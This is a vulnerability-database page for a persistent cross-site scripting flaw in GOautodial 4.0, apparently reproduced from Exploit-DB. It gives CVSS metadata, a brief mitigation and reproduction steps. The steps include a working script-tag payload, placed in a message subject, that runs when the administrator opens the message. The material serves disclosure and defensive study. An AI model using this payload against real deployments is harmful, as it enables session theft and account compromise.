header-logo
Suggest Exploit
vendor:
GOautodial 4.0
by:
Balzabu
8.8
CVSS
HIGH
Persistent Cross-Site Scripting
79
CWE
Product Name: GOautodial 4.0
Affected Version From: 4.0
Affected Version To: 4.0
Patch Exists: NO
Related CWE: N/A
CPE: goautodial:goautodial_4.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: CentOS 7
2020

GOautodial 4.0 – Persistent Cross-Site Scripting (Authenticated)

GOautodial 4.0 is vulnerable to a persistent cross-site scripting (XSS) vulnerability. An authenticated user can inject malicious JavaScript code into a message sent to another user. The code will be executed when the recipient reads the message.

Mitigation:

Input validation should be used to prevent malicious code from being injected into messages.
Source

Exploit-DB raw data:

# Exploit Title: GOautodial 4.0 - Persistent Cross-Site Scripting (Authenticated)
# Author: Balzabu
# Discovery Date: 2020-07-23
# Vendor Homepage: https://goautodial.org/
# Software Link: https://goautodial.org/GOautodial-4-x86_64-Final-20191010-0150.iso.html
# Tested Version: 4.0 (Last relase as of today)
# Tested on OS: CentOS 7

# STEPS TO REPRODUCE:

# 1 - Log in as an agent
# 2 - Write a new message to user goadmin with:
Subject: Help me, I can't connect to the webphone <script src=1
href=1 onerror="javascript:alert(document.cookies)"></script>
Text: whatever you want
# 3 - Send and wait for goadmin to read the message... :-)

Navigation

Suggest Exploit

Services By CQR